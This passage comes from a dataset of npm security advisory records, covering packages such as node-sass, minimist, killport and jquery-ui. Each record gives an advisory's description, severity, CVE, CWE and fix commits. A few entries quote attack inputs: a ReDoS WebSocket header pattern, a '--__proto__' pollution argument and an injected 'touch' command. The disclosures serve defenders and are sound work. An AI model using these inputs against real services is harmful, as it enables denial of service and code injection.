https://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass) https://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass) [PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling) ### For more information If you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js ### Reporter credit [Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx
{'CVE-2021-27516'}
2021-02-26T21:37:41Z
2021-03-01T20:03:53Z
MODERATE
null
{'CWE-20'}
{'https://github.com/medialize/URI.js/commit/a1ad8bcbc39a4d136d7e252e76e957f3ece70839', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27516', 'https://advisory.checkmarx.net/advisory/CX-2021-4305', 'https://github.com/medialize/URI.js/security/advisories/GHSA-p6j9-7xhc-rhwp', 'https://github.com/medialize/URI.js/releases/tag/v1.19.6'}
null
{'https://github.com/medialize/URI.js/commit/a1ad8bcbc39a4d136d7e252e76e957f3ece70839'}
{'https://github.com/medialize/URI.js/commit/a1ad8bcbc39a4d136d7e252e76e957f3ece70839'}
npm
GHSA-9v62-24cr-58cx
Denial of Service in node-sass
Affected versions of `node-sass` are vulnerable to Denial of Service (DoS). Crafted objects passed to the `renderSync` function may trigger C++ assertions in `CustomImporterBridge::get_importer_entry` and `CustomImporterBridge::post_process_return_value` that crash the Node process. This may allow attackers to crash the system's running Node process and lead to Denial of Service. ## Recommendation Upgrade to version 4.13.1 or later
null
2021-09-28T16:08:17Z
2020-09-11T21:12:39Z
MODERATE
null
{'CWE-400'}
{'https://www.npmjs.com/advisories/961', 'https://github.com/sass/node-sass', 'https://github.com/sass/node-sass/commit/338fd7a14d3b8bd374a382336df16f9c6792b884'}
null
{'https://github.com/sass/node-sass/commit/338fd7a14d3b8bd374a382336df16f9c6792b884'}
{'https://github.com/sass/node-sass/commit/338fd7a14d3b8bd374a382336df16f9c6792b884'}
npm
GHSA-5c8j-xr24-2665
Potential Command Injection in printer
Versions 0.0.1 and earlier of `printer` are affected by a command injection vulnerability resulting from a failure to sanitize command arguments properly in the `printDirect()` function. ## Recommendation Update to version 0.0.2 or later.
{'CVE-2014-3741'}
2021-09-01T21:34:20Z
2017-11-28T22:44:52Z
CRITICAL
null
{'CWE-77'}
{'https://nvd.nist.gov/vuln/detail/CVE-2014-3741', 'https://www.npmjs.com/advisories/27', 'https://github.com/advisories/GHSA-5c8j-xr24-2665', 'https://github.com/tojocky/node-printer', 'https://nodesecurity.io/advisories/printer_potential_command_injection', 'http://www.openwall.com/lists/oss-security/2014/05/15/2', 'https://github.com/tojocky/node-printer/commit/e001e38738c17219a1d9dd8c31f7d82b9c0013c7', 'http://www.openwall.com/lists/oss-security/2014/05/13/1'}
null
{'https://github.com/tojocky/node-printer/commit/e001e38738c17219a1d9dd8c31f7d82b9c0013c7'}
{'https://github.com/tojocky/node-printer/commit/e001e38738c17219a1d9dd8c31f7d82b9c0013c7'}
npm
GHSA-5xf4-f2fq-f69j
Improper link resolution before file access (Link Following)
In Yarn before 1.21.1, the package install functionality can be abused to generate arbitrary symlinks on the host filesystem by using specially crafted "bin" keys. Existing files could be overwritten depending on the current user permission set.
{'CVE-2019-10773'}
2021-08-19T17:16:27Z
2020-02-14T23:10:16Z
HIGH
null
{'CWE-78'}
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ITY5BC63CCC647DFNUQRQ5AJDKUKUNBI/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10773', 'https://blog.daniel-ruf.de/critical-design-flaw-npm-pnpm-yarn/', 'https://snyk.io/vuln/SNYK-JS-YARN-537806,', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HIZW4NZVV5QY5WWGW2JRP3FHYKZ6ZJ5/', 'https://github.com/yarnpkg/yarn/commit/039bafd74b7b1a88a53a54f8fa6fa872615e90e7', 'https://github.com/yarnpkg/yarn/issues/7761#issuecomment-565493023', 'https://access.redhat.com/errata/RHSA-2020:0475', 'https://github.com/yarnpkg/yarn/pull/7755'}
null
{'https://github.com/yarnpkg/yarn/commit/039bafd74b7b1a88a53a54f8fa6fa872615e90e7'}
{'https://github.com/yarnpkg/yarn/commit/039bafd74b7b1a88a53a54f8fa6fa872615e90e7'}
npm
GHSA-g78m-2chm-r7qv
Regular Expression Denial of Service in websocket-extensions (NPM package)
### Impact The ReDoS flaw allows an attacker to exhaust the server's capacity to process incoming requests by sending a WebSocket handshake request containing a header of the following form: Sec-WebSocket-Extensions: a; b="\c\c\c\c\c\c\c\c\c\c ... That is, a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. The parser takes exponential time to reject this header as invalid, and this will block the processing of any other work on the same thread. Thus if you are running a single-threaded server, such a request can render your service completely unavailable. ### Patches Users should upgrade to version 0.1.4. ### Workarounds There are no known work-arounds other than disabling any public-facing WebSocket functionality you are operating. ### References - https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions/
{'CVE-2020-7662'}
2021-08-25T21:51:05Z
2020-06-05T16:16:12Z
HIGH
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7662', 'https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions', 'https://github.com/faye/websocket-extensions-node/commit/29496f6838bfadfe5a2f85dff33ed0ba33873237', 'https://github.com/faye/websocket-extensions-node/security/advisories/GHSA-g78m-2chm-r7qv', 'https://github.com/faye/websocket-extensions-node', 'https://snyk.io/vuln/SNYK-JS-WEBSOCKETEXTENSIONS-570623'}
null
{'https://github.com/faye/websocket-extensions-node/commit/29496f6838bfadfe5a2f85dff33ed0ba33873237'}
{'https://github.com/faye/websocket-extensions-node/commit/29496f6838bfadfe5a2f85dff33ed0ba33873237'}
npm
GHSA-xw22-wv29-3299
ApiKey secret could be revelated on network issue
### Impact _What kind of vulnerability is it? Who is impacted?_ Applications that are using node-etsy-client and reporting client error to the end user will offer api key value too ### Patches _Has the problem been patched? What versions should users upgrade to?_ creharmony/node-etsy-client#18 fixes this issue. This is fixed in [node-etsy-client v0.3.0](https://github.com/creharmony/node-etsy-client/tree/v0.3.0) and later. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Do not report or log etsy client error if you are using version <= v0.2.0 Update your version of node-etsy-client ### References _Are there any links users can visit to find out more?_ - https://github.com/creharmony/node-etsy-client/issues/17 : On connect error secret appears in error #17 ### For more information If you have any questions or comments about this advisory: * Open an issue in [github.com/creharmony/node-etsy-client/issues](https://github.com/creharmony/node-etsy-client/issues/)
{'CVE-2021-21421'}
2021-04-02T17:05:21Z
2021-04-06T17:29:52Z
HIGH
null
{'CWE-200'}
{'https://github.com/creharmony/node-etsy-client/security/advisories/GHSA-xw22-wv29-3299', 'https://github.com/creharmony/node-etsy-client/commit/b4beb8ef080366c1a87dbf9e163051a446acaa7d', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21421'}
null
{'https://github.com/creharmony/node-etsy-client/commit/b4beb8ef080366c1a87dbf9e163051a446acaa7d'}
{'https://github.com/creharmony/node-etsy-client/commit/b4beb8ef080366c1a87dbf9e163051a446acaa7d'}
npm
GHSA-5fw9-fq32-wv5p
OS Command Injection in node-notifier
This affects the package node-notifier before 8.0.1. It allows an attacker to run arbitrary commands on Linux machines due to the options params not being sanitised when being passed an array.
{'CVE-2020-7789'}
2020-12-21T16:03:51Z
2020-12-21T16:04:07Z
MODERATE
null
{'CWE-78'}
{'https://github.com/mikaelbr/node-notifier/commit/5d62799dab88505a709cd032653b2320c5813fce', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1050371', 'https://github.com/mikaelbr/node-notifier/blob/master/lib/utils.js%23L303', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7789', 'https://snyk.io/vuln/SNYK-JS-NODENOTIFIER-1035794'}
null
{'https://github.com/mikaelbr/node-notifier/commit/5d62799dab88505a709cd032653b2320c5813fce'}
{'https://github.com/mikaelbr/node-notifier/commit/5d62799dab88505a709cd032653b2320c5813fce'}
npm
GHSA-fm93-fhh2-cg2c
Prototype Pollution in min-dash
The package min-dash before 3.8.1 are vulnerable to Prototype Pollution via the set method due to missing enforcement of key types.
{'CVE-2021-23460'}
2022-01-27T14:11:41Z
2022-01-27T14:21:53Z
HIGH
null
{'CWE-1321'}
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2342127', 'https://github.com/bpmn-io/min-dash/blob/c4d579c0eb2ed0739592111c3906b198921d3f52/lib/object.js%23L32', 'https://github.com/bpmn-io/min-dash/pull/21/commits/5ab05cbc4fd8d5eafb7db540c491ed0906b9d320', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23460', 'https://github.com/bpmn-io/min-dash', 'https://github.com/bpmn-io/min-dash/pull/21', 'https://snyk.io/vuln/SNYK-JS-MINDASH-2340605'}
null
{'https://github.com/bpmn-io/min-dash/pull/21/commits/5ab05cbc4fd8d5eafb7db540c491ed0906b9d320'}
{'https://github.com/bpmn-io/min-dash/pull/21/commits/5ab05cbc4fd8d5eafb7db540c491ed0906b9d320'}
npm
GHSA-5w25-hxp5-h8c9
Improper Verification of Cryptographic Signature
tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. In versions prior to 7.0.3, the `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid. This issue is patched in version 7.0.3. As a workaround: In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`.
{'CVE-2021-32685'}
2021-06-17T18:47:52Z
2021-06-21T17:12:13Z
CRITICAL
null
{'CWE-347'}
{'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b', 'https://github.com/TogaTech/tEnvoy/releases/tag/v7.0.3', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32685', 'https://github.com/TogaTech/tEnvoy/security/advisories/GHSA-7r96-8g3x-g36m'}
null
{'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b'}
{'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b'}
npm
GHSA-23cm-x6j7-6hq3
matrix-js-sdk can be tricked into disclosing E2EE room keys to a participating homeserver
### Impact A logic error in the room key sharing functionality of matrix-js-sdk before 12.4.1 allows a malicious Matrix homeserver† participating in an encrypted room to steal room encryption keys from affected Matrix clients participating in that room. This allows the homeserver to decrypt end-to-end encrypted messages sent by affected clients. † Or anyone with access to the account of the original recipient of an encrypted message. Known clients affected (via their use of vulnerable versions of matrix-js-sdk): - Element Web (1.8.2 and earlier) - Element Desktop (1.8.2 and earlier) - SchildiChat Web (1.7.32-sc1 and earlier) - SchildiChat Desktop (1.7.32-sc1 and earlier) - Cinny (1.2.0 and earlier) ### Patch This was fixed in https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9. ### Workarounds To prevent a homeserver from being able to steal the room keys, vulnerable clients can be taken offline or signed out. If signing out, care should be taken to either set up Secure Backup or export E2E room keys in order to preserve access to past messages.
{'CVE-2021-40823'}
2021-10-21T14:27:03Z
2021-09-14T20:24:18Z
MODERATE
null
{'CWE-200'}
{'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-23cm-x6j7-6hq3', 'https://github.com/matrix-org/matrix-js-sdk/releases/tag/v12.4.1', 'https://matrix.org/blog/2021/09/13/vulnerability-disclosure-key-sharing', 'https://github.com/matrix-org/matrix-js-sdk', 'https://nvd.nist.gov/vuln/detail/CVE-2021-40823', 'https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9'}
null
{'https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9'}
{'https://github.com/matrix-org/matrix-js-sdk/commit/894c24880da0e1cc81818f51c0db80e3c9fb2be9'}
npm
GHSA-g7mq-rfj2-25wq
Code Injection in total4
The package total4 before 0.0.43 are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.
{'CVE-2021-23390'}
2021-07-13T19:43:28Z
2021-12-10T17:26:33Z
CRITICAL
null
{'CWE-94'}
{'https://snyk.io/vuln/SNYK-JS-TOTAL4-1130527', 'https://github.com/totaljs/framework4/blob/master/utils.js%23L5430-L5455', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23390', 'https://github.com/totaljs/framework4/commit/8a72d8c20f38bbcac031a76a51238aa528f68821'}
null
{'https://github.com/totaljs/framework4/commit/8a72d8c20f38bbcac031a76a51238aa528f68821'}
{'https://github.com/totaljs/framework4/commit/8a72d8c20f38bbcac031a76a51238aa528f68821'}
npm
GHSA-rc3x-jf5g-xvc5
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
{'CVE-2021-23495'}
2022-03-09T21:08:20Z
2022-02-26T00:00:38Z
MODERATE
null
{'CWE-601'}
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2412347', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23495', 'https://github.com/karma-runner/karma', 'https://snyk.io/vuln/SNYK-JS-KARMA-2396325', 'https://github.com/karma-runner/karma/commit/ff7edbb2ffbcdd69761bece86b7dc1ef0740508d'}
null
{'https://github.com/karma-runner/karma/commit/ff7edbb2ffbcdd69761bece86b7dc1ef0740508d'}
{'https://github.com/karma-runner/karma/commit/ff7edbb2ffbcdd69761bece86b7dc1ef0740508d'}
npm
GHSA-hgjh-723h-mx2j
Authorization Bypass Through User-Controlled Key in url-parse
url-parse prior to version 1.5.8 is vulnerable to Authorization Bypass Through User-Controlled Key.
{'CVE-2022-0686'}
2022-03-03T19:19:03Z
2022-02-21T00:00:21Z
CRITICAL
null
{'CWE-639'}
{'https://github.com/unshiftio/url-parse', 'https://github.com/unshiftio/url-parse/commit/d5c64791ef496ca5459ae7f2176a31ea53b127e5', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0686', 'https://huntr.dev/bounties/55fd06cd-9054-4d80-83be-eb5a454be78c', 'https://security.netapp.com/advisory/ntap-20220325-0006/'}
null
{'https://github.com/unshiftio/url-parse/commit/d5c64791ef496ca5459ae7f2176a31ea53b127e5'}
{'https://github.com/unshiftio/url-parse/commit/d5c64791ef496ca5459ae7f2176a31ea53b127e5'}
npm
GHSA-9m4x-8w29-r78g
Server-Side Request Forgery in @uppy/companion
The @uppy/companion npm package before versions 1.13.2 and 2.0.0-alpha.5 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.
{'CVE-2020-8205'}
2020-08-13T18:54:01Z
2020-08-13T18:54:19Z
MODERATE
null
{'CWE-918'}
{'https://github.com/transloadit/uppy/pull/2322/commits/dbf2f4f30aeaf3bcc5971bb867bb0b5984084828', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8205', 'https://hackerone.com/reports/891270', 'https://github.com/transloadit/uppy/blob/master/CHANGELOG.md#1161'}
null
{'https://github.com/transloadit/uppy/pull/2322/commits/dbf2f4f30aeaf3bcc5971bb867bb0b5984084828'}
{'https://github.com/transloadit/uppy/pull/2322/commits/dbf2f4f30aeaf3bcc5971bb867bb0b5984084828'}
npm
GHSA-f78f-353m-cf4j
Code Injection in node-rules
node-rules including 3.0.0 and prior to 5.0.0 allows injection of arbitrary commands. The argument rules of function "fromJSON()" can be controlled by users without any sanitization.
{'CVE-2020-7609'}
2021-07-29T16:13:17Z
2021-12-10T20:05:37Z
CRITICAL
null
{'CWE-94'}
{'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7609', 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832,'}
null
{'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832,', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832'}
{'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832,', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832'}
npm
GHSA-hpcf-8vf9-q4gj
XSS in dialog closeText in jquery-ui
Affected versions of `jquery-ui` are vulnerable to a cross-site scripting vulnerability when arbitrary user input is supplied as the value of the `closeText` parameter in the `dialog` function. jQuery-UI is a library for manipulating UI elements via jQuery. Version 1.11.4 has a cross site scripting (XSS) vulnerability in the `closeText` parameter of the `dialog` function. If your application passes user input to this parameter, it may be vulnerable to XSS via this attack vector. ## Recommendation Upgrade to jQuery-UI 1.12.0 or later.
{'CVE-2016-7103'}
2022-02-08T22:08:49Z
2017-10-24T18:33:35Z
HIGH
null
{'CWE-79'}
{'http://rhn.redhat.com/errata/RHSA-2016-2933.html', 'http://rhn.redhat.com/errata/RHSA-2017-0161.html', 'https://security.netapp.com/advisory/ntap-20190416-0007/', 'https://github.com/jquery/jquery-ui', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://github.com/jquery/jquery-ui/commit/9644e7bae9116edaf8d37c5b38cb32b892f10ff6', 'https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://nodesecurity.io/advisories/127', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://github.com/jquery/api.jqueryui.com/issues/281', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'http://www.securityfocus.com/bid/104823', 'https://www.tenable.com/security/tns-2016-19', 'https://nvd.nist.gov/vuln/detail/CVE-2016-7103', 'http://rhn.redhat.com/errata/RHSA-2016-2932.html', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://jqueryui.com/changelog/1.12.0/', 'https://www.npmjs.com/advisories/127', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E2I4UHPIW26FIALH7GGZ3IYUUA53VOOJ/', 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://www.drupal.org/sa-core-2022-002', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://github.com/advisories/GHSA-hpcf-8vf9-q4gj', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://github.com/jquery/jquery-ui/pull/1622', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
null
{'https://github.com/jquery/jquery-ui/commit/9644e7bae9116edaf8d37c5b38cb32b892f10ff6'}
{'https://github.com/jquery/jquery-ui/commit/9644e7bae9116edaf8d37c5b38cb32b892f10ff6'}
npm
GHSA-q24h-5rq3-63j9
Incorrect Authorization in @uppy/companion
@uppy/companion prior to version 3.3.1 is vulnerable to incorrect authorization. A user with URL upload access could enumerate internal companion server networks, send local webservers files to the destination server, and finally download them If each of these files had a guessable and regular name.
{'CVE-2022-0528'}
2022-03-10T21:57:56Z
2022-03-04T00:00:19Z
HIGH
null
{'CWE-863', 'CWE-200'}
{'https://github.com/transloadit/uppy/commit/267c34045a1e62c98406d8c31261c604a11e544a', 'https://github.com/transloadit/uppy', 'https://huntr.dev/bounties/8b060cc3-2420-468e-8293-b9216620175b', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0528'}
null
{'https://github.com/transloadit/uppy/commit/267c34045a1e62c98406d8c31261c604a11e544a'}
{'https://github.com/transloadit/uppy/commit/267c34045a1e62c98406d8c31261c604a11e544a'}
npm
GHSA-4jqc-8m5r-9rpr
Prototype Pollution in set-value
This affects the package `set-value` before 2.0.1, and starting with 3.0.0 but prior to 4.0.1. A type confusion vulnerability can lead to a bypass of CVE-2019-10747 when the user-provided keys used in the path parameter are arrays.
{'CVE-2021-23440'}
2022-03-30T21:18:05Z
2021-09-13T20:09:36Z
HIGH
null
{'CWE-843', 'CWE-1321'}
{'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1584212', 'https://snyk.io/vuln/SNYK-JS-SETVALUE-1540541', 'https://github.com/jonschlinkert/set-value', 'https://github.com/jonschlinkert/set-value/pull/33', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23440', 'https://github.com/jonschlinkert/set-value/commit/7cf8073bb06bf0c15e08475f9f952823b4576452', 'https://www.huntr.dev/bounties/2eae1159-01de-4f82-a177-7478a408c4a2/'}
null
{'https://github.com/jonschlinkert/set-value/commit/7cf8073bb06bf0c15e08475f9f952823b4576452'}
{'https://github.com/jonschlinkert/set-value/commit/7cf8073bb06bf0c15e08475f9f952823b4576452'}
npm
GHSA-vh95-rmgr-6w4m
Prototype Pollution in minimist
Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. Parsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application. This is exploitable if attackers have control over the arguments being passed to `minimist`. ## Recommendation Upgrade to versions 0.2.1, 1.2.3 or later.
{'CVE-2020-7598'}
2022-04-26T21:01:40Z
2020-04-03T21:48:32Z
MODERATE
null
{'CWE-1321'}
{'https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7598', 'https://github.com/substack/minimist', 'http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html', 'https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94', 'https://www.npmjs.com/advisories/1179', 'https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95', 'https://snyk.io/vuln/SNYK-JS-MINIMIST-559764'}
null
{'https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95', 'https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab', 'https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94'}
{'https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94', 'https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95', 'https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab'}
npm
GHSA-2gjg-5x33-mmp2
Path Traversal in localhost-now
Versions of `localhost-now` before 1.0.2 are vulnerable to path traversal. This allows a remote attacker to read the content of an arbitrary file. ## Recommendation Update to version 1.0.2 or later.
{'CVE-2018-3729'}
2020-08-31T18:28:41Z
2018-07-25T22:44:05Z
HIGH
null
{'CWE-22'}
{'https://www.npmjs.com/advisories/582', 'https://hackerone.com/reports/312889', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3729', 'https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2', 'https://github.com/advisories/GHSA-2gjg-5x33-mmp2'}
null
{'https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2'}
{'https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2'}
npm
GHSA-c36v-fmgq-m8hx
Prototype Pollution in immer
immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
{'CVE-2021-3757'}
2021-09-03T20:17:21Z
2021-09-07T22:57:14Z
HIGH
null
{'CWE-915', 'CWE-1321'}
{'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237', 'https://github.com/immerjs/immer', 'https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3757'}
null
{'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}
{'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}
npm
GHSA-vwhc-pww7-72x6
Code Injection in total.js
Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.
{'CVE-2021-32831'}
2021-08-31T20:25:52Z
2021-09-01T18:24:05Z
HIGH
null
{'CWE-94'}
{'https://github.com/totaljs', 'https://www.npmjs.com/package/total.js', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32831', 'https://securitylab.github.com/advisories/GHSL-2021-066-totaljs-totaljs/', 'https://github.com/totaljs/framework/blob/e644167d5378afdc45cb0156190349b2c07ef235/changes.txt#L11', 'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3'}
null
{'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3'}
{'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3'}
npm
GHSA-fc42-h7q4-qp8h
Command Injection in killport
This affects the package killport before 1.0.2. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization. Running this PoC will cause the command touch success to be executed, leading to the creation of a file called success.
{'CVE-2021-23360'}
2021-03-22T18:24:32Z
2021-04-13T15:16:20Z
HIGH
null
{'CWE-77'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23360', 'https://github.com/ssnau/killport/blob/5268f23ea8f152e47182b263d8f7ef20c12a9f28/index.js%23L9', 'https://snyk.io/vuln/SNYK-JS-KILLPORT-1078535', 'https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638'}
null
{'https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638'}
{'https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638'}
npm
GHSA-v3jv-wrf4-5845
Local Privilege Escalation in npm
Affected versions of `npm` use predictable temporary file names during archive unpacking. If an attacker can create a symbolic link at the location of one of these temporary file names, the attacker can arbitrarily write to any file that the user which owns the `npm` process has permission to write to, potentially resulting in local privilege escalation. ## Recommendation Update to version 1.3.3 or later.
{'CVE-2013-4116'}
2021-09-23T21:38:18Z
2020-09-01T16:03:34Z
LOW
null
{'CWE-59'}
{'https://nvd.nist.gov/vuln/detail/CVE-2013-4116', 'https://bugzilla.redhat.com/show_bug.cgi?id=983917', 'https://github.com/npm/npm/commit/f4d31693', 'http://www.openwall.com/lists/oss-security/2013/07/10/17', 'https://github.com/npm/npm/issues/3635', 'https://www.npmjs.com/advisories/152', 'http://www.openwall.com/lists/oss-security/2013/07/11/9', 'http://www.securityfocus.com/bid/61083', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=715325', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/87141', 'https://github.com/npm/npm'}
null
{'https://github.com/npm/npm/commit/f4d31693'}
{'https://github.com/npm/npm/commit/f4d31693'}
npm
GHSA-5pg7-v24c-9rp9
Prototype pollution in controlled-merge
Prototype pollution vulnerability in 'controlled-merge' versions 1.0.0 through 1.2.0 allows attacker to cause a denial of service and may lead to remote code execution.
{'CVE-2020-28268'}
2021-04-19T22:11:46Z
2021-05-18T01:53:46Z
HIGH
null
{'CWE-1321'}
{'https://www.npmjs.com/package/controlled-merge', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28268', 'https://github.com/hlfshell/controlled-merge/commit/5a4b2e9ffe5a0be7f8843d4ab038599d3ae5f9d4', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28268'}
null
{'https://github.com/hlfshell/controlled-merge/commit/5a4b2e9ffe5a0be7f8843d4ab038599d3ae5f9d4'}
{'https://github.com/hlfshell/controlled-merge/commit/5a4b2e9ffe5a0be7f8843d4ab038599d3ae5f9d4'}
npm
GHSA-52qp-gwwh-qrg4
Missing Handler in @scandipwa/magento-scripts
